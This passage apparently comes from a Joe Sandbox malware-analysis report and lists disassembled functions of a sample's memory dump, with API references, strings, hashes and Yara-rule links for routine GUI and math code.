Instruction Fuzzy Hash: EBE11922E087DD55E213B73768421B7E752BFAE784F6C8B32ED48312A1DB297981C911

Function 00007FF78660E4B0 Relevance: 6.3, APIs: 4, Instructions: 335COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660E61F
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660E633
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660E991
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660E9DA

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 5377f22ed5d838f2895b7faaba13ee2eec79f3aadfd082452500dc4e195f3568
Instruction ID: 4eb8871041b83da1601d5cf8b9a5dc08c3f5dbc30fc0b5298ff564d26dc3d1bf
Opcode Fuzzy Hash: 5377f22ed5d838f2895b7faaba13ee2eec79f3aadfd082452500dc4e195f3568
Instruction Fuzzy Hash: 26E11C32F187CD95E262B73764421BAE351BF6E384F6D8B32ED4872161DF297880CA11

Function 00007FF78662D7DC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF78662D808
GetCurrentThreadId.KERNEL32 ref: 00007FF78662D816
GetCurrentProcessId.KERNEL32 ref: 00007FF78662D822
QueryPerformanceCounter.KERNEL32 ref: 00007FF78662D832

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 2db7dfdc03936b6bf7c48da1f1dffee80b17a559b217e68d35e256956bf76f98
Instruction ID: 80a05fca2e6599445ec2c44a8198d48cb35b88ac88b4c4ed56388a87740d3af8
Opcode Fuzzy Hash: 2db7dfdc03936b6bf7c48da1f1dffee80b17a559b217e68d35e256956bf76f98
Instruction Fuzzy Hash: C2115E22B14F419AEB00DFA0EC452BA73A4FB18758F840E31DA6D867A4DF7CD568C790

Function 00007FF78662D960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF786611965), ref: 00007FF78662D986
FormatMessageA.KERNEL32 ref: 00007FF78662D9B9

Strings

!x-sys-default-locale, xrefs: 00007FF78662D979

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 6382632fb6551c3d1f3fcaf78c734f7ee09439dfb8f0b72809a52a0a9b1e1e88
Instruction ID: 8ae98a22eba0810cbe4f5432bde823ba5c4c9242bedd0e963ed018c914c5f857
Opcode Fuzzy Hash: 6382632fb6551c3d1f3fcaf78c734f7ee09439dfb8f0b72809a52a0a9b1e1e88
Instruction Fuzzy Hash: BB018472F087C192E7119B52F9107ABA793F784784FA48035EA8906B94CF7CD954CB10

Function 00007FF786607680 Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

Strings

%*s%.*s, xrefs: 00007FF786607F13
%.*s, xrefs: 00007FF786607EEE

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID: %*s%.*s$ %.*s
API String ID: 0-3400057116
Opcode ID: 101ef694adbca4e4ba29ea4c6ba4e87cabf422faf2781e82c88b9a0c7baaea15
Instruction ID: fca82befbb190ef49be5a3644df1e41e305b278805e433929af61b9257f8ad4f
Opcode Fuzzy Hash: 101ef694adbca4e4ba29ea4c6ba4e87cabf422faf2781e82c88b9a0c7baaea15
Instruction Fuzzy Hash: AB22B532E086C5A5E711EB36D8401FAB761FF693A8FA44331DB5827695EF38A844CF11

Function 00007FF7865FA800 Relevance: 4.2, APIs: 3, Instructions: 418COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7865F81F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F834C
Part of subcall function 00007FF7865F81F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F8379
Part of subcall function 00007FF7865F81F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F83A0
Part of subcall function 00007FF7865F81F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F83C3

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FACC7

Part of subcall function 00007FF7865F9C40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F9CFA

Part of subcall function 00007FF7865F9250: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F9352

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FAC8B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FACA6

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: free$ceilffloorfmalloc
String ID:
API String ID: 573317343-0
Opcode ID: 6103c6827c6f7d8e55da1acf43e3646be8bed51213157170e144a2b2a04bda1b
Instruction ID: 76867de3f60c9a562fa03dbff4635c1c5f04139cd6bbb6b9d4b3b2b5b32b1cdb
Opcode Fuzzy Hash: 6103c6827c6f7d8e55da1acf43e3646be8bed51213157170e144a2b2a04bda1b
Instruction Fuzzy Hash: FD12D332A18B948AE311DB35D4406BEB7B4FF5D744F158326EE8863754EB38E991CB10

Function 00007FF786610D80 Relevance: 3.1, APIs: 2, Instructions: 139COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF786610E68

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 61ccd571a2d0150a639dbd3c576fc50a319b267b109b5d72c498ec22863b7b14
Instruction ID: e7861b60e7448bd7673199da3329d415d11fe19e251268fc64400c499981a174
Opcode Fuzzy Hash: 61ccd571a2d0150a639dbd3c576fc50a319b267b109b5d72c498ec22863b7b14
Instruction Fuzzy Hash: 19412451F28BCD52EC12A23A04028BAD5837F6A7C4EB8C731E94E31395EF2876D2CD10

Function 00007FF786605220 Relevance: 2.9, Strings: 2, Instructions: 416COMMON

Download Yara Rule

Strings

#SCROLLY, xrefs: 00007FF786605263
#SCROLLX, xrefs: 00007FF786605259

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID: #SCROLLX$#SCROLLY
API String ID: 0-350977493
Opcode ID: ad8c3ae938cae5e1364068c7c62dfdda6d58573bb671b2eafec8b0c8ddfa324d
Instruction ID: b74d0bd2ea662d49be95f3d9544cd58c3776e634a413f3bf34ad17b5f7b50d1c
Opcode Fuzzy Hash: ad8c3ae938cae5e1364068c7c62dfdda6d58573bb671b2eafec8b0c8ddfa324d
Instruction Fuzzy Hash: 5D12D522E18BCD95E213DA3795421BAB351FF7E384F68DB22FE4536162DB24B4D1CA10

Function 00007FF786600BA0 Relevance: 2.8, Strings: 2, Instructions: 314COMMON

Download Yara Rule

Strings

- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X , xrefs: 00007FF786600BDD
..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF786600BFC

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID: - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X $..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...
API String ID: 0-4293514333
Opcode ID: 37e8cdeb4ba418f8d4a705152ae5e262be9a6a161ea8553f01e88e4d1b9b64e2
Instruction ID: 4f166476fcc6bf230961a320ceac6ab01f05ab855a01f3fae623cbf014bcff4d
Opcode Fuzzy Hash: 37e8cdeb4ba418f8d4a705152ae5e262be9a6a161ea8553f01e88e4d1b9b64e2
Instruction Fuzzy Hash: 8CD11B237046D889D754CF2DC8C5A7DBB9AE794B02B9BC176CE89827A1EF7AC445C310

Function 00007FF786605990 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

[ ], xrefs: 00007FF786605E33
[x], xrefs: 00007FF786605E2C

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID: [ ]$[x]
API String ID: 0-3323218928
Opcode ID: 6198f9d158b34d2eadace60d01b4764ae560e671f087e788dbe75f3397044d11
Instruction ID: c80c8417fc9c8d6799e9c95ff75835d5bd3d8ed654d38f9e358e5f7bdb9de2cc
Opcode Fuzzy Hash: 6198f9d158b34d2eadace60d01b4764ae560e671f087e788dbe75f3397044d11
Instruction Fuzzy Hash: 0AE10C32E18BC995E302EB3698411FAF351FF6E344F589731FE58265A6DB39A481CB10

Function 00007FF78661A6E0 Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00007FF78661A732
VUUU, xrefs: 00007FF78661A74C

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID: VUUU$VUUU
API String ID: 0-3149182767
Opcode ID: 5d87d6ba4afe68662672b46fa6bdbe9a1e29de5b7660a827c943cf5e3ef8fec8
Instruction ID: 96b11d4d51de9cbdce719fc1e9c8f2b1042af9e7b880e60c966135afbe0908db
Opcode Fuzzy Hash: 5d87d6ba4afe68662672b46fa6bdbe9a1e29de5b7660a827c943cf5e3ef8fec8
Instruction Fuzzy Hash: 89C1EC33F10B8899E301DB3AD8419E9B361FB6A7887149321FA0C77665DF34A591DB80

Function 00007FF7865F9250 Relevance: 2.7, APIs: 2, Instructions: 214COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F9352
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F9592

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: d40e23041365ade541bdf4a53b98d373e0afc8b5af528aafedd37807940236fb
Instruction ID: 00994a134d355a5a670c6efc1cd302a9f55e8acb184b538d0320d4b3bc15e170
Opcode Fuzzy Hash: d40e23041365ade541bdf4a53b98d373e0afc8b5af528aafedd37807940236fb
Instruction Fuzzy Hash: 08914932A19AC596DB11DB3AD4007BAB360FF99785F64C331DE49636A5EF38E485CB00

Function 00007FF7866065D0 Relevance: 1.8, Strings: 1, Instructions: 508COMMON

Download Yara Rule

Strings

##Combo_%02d, xrefs: 00007FF786606CD2

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID: ##Combo_%02d
API String ID: 0-4250768120
Opcode ID: 2d66ad83fc5ffe68628b1058c1bc2f4d4678855f7c403d415a8a44415fcc44bc
Instruction ID: 580e7fa6fdc6705bb112f340a61241223f3ee289cec8ee2f788b6bdb7ca5b128
Opcode Fuzzy Hash: 2d66ad83fc5ffe68628b1058c1bc2f4d4678855f7c403d415a8a44415fcc44bc
Instruction Fuzzy Hash: C842F532A18BC596E711EB36D8411EAF361FF99384F649332EA48665A5DF38E494CF00

Function 00007FF786602E50 Relevance: 1.7, APIs: 1, Instructions: 488COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF786603141

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 527ef19b1038ab48084da004566cdd808e56da57c3c39390ccd3fb9dbd82dffe
Instruction ID: d63857bfa2f7b36701adff92b5dff182024c7dde17c7a3794c6d7f126f1e0c4f
Opcode Fuzzy Hash: 527ef19b1038ab48084da004566cdd808e56da57c3c39390ccd3fb9dbd82dffe
Instruction Fuzzy Hash: 09427176B04B8592E710DF26D8846AAB7B1FBC8B85F658232CE4D53B24CF39E445CB10

Function 00007FF7865FA2F0 Relevance: 1.4, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF7865FA34A

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 00ed38a4f8997660fad8e667f80b229b9e1a2eba2e7b24625d25898ebcefaf7f
Instruction ID: d92e5432234c0914f7c74f515995360fc7c79b622750fe15a6102ffeb780e29d
Opcode Fuzzy Hash: 00ed38a4f8997660fad8e667f80b229b9e1a2eba2e7b24625d25898ebcefaf7f
Instruction Fuzzy Hash: 9B6139B361C2E392D7565B3CE84527EAED0B789348F6C9234EA8AC2B85C93CDD04C751

Function 00007FF7865FA040 Relevance: 1.4, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF7865FA0AA

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 72f3ff59168126c3de56dea8762daef82d873cbdfea7066be461112d5e5ce4aa
Instruction ID: 9b7cf5bda005c7676e7fd55c7b874c24a90dbbaf97acdf2d77b00d1059ede1ca
Opcode Fuzzy Hash: 72f3ff59168126c3de56dea8762daef82d873cbdfea7066be461112d5e5ce4aa
Instruction Fuzzy Hash: 0F612773B1C6E1D6D7158B39E805A7AFEA4F789308F5A8235DA8CC3A45DA2FD900C711

Function 00007FF7865EF480 Relevance: 1.0, Instructions: 981COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d1fd18e4b0c39a78f19c14b58ed31fef6952396bb70bcc648b832da75d60cd3
Instruction ID: ac9e900fdfcce3f60cb2142108109cdadba41c060f4627e57d4810a908cff807
Opcode Fuzzy Hash: 4d1fd18e4b0c39a78f19c14b58ed31fef6952396bb70bcc648b832da75d60cd3
Instruction Fuzzy Hash: 7EB27536D186C996E756AF36C4402FAB750FF59B48F6C8735DE082A195EF387980CB20

Function 00007FF7865F0E80 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 954158c77ccbb84d33b3060ab461d5729eef0503c0e04979f62f7c81a2405d5e
Instruction ID: d95a20d660a150da009e150c1a3d144058925ed1b82cde52e9c5852d82add8cb
Opcode Fuzzy Hash: 954158c77ccbb84d33b3060ab461d5729eef0503c0e04979f62f7c81a2405d5e
Instruction Fuzzy Hash: EA22F932A086C596E761AF36C8412BAF790FF15B84FAC8735DE0D67694DF28B854C720

Function 00007FF7865F8570 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
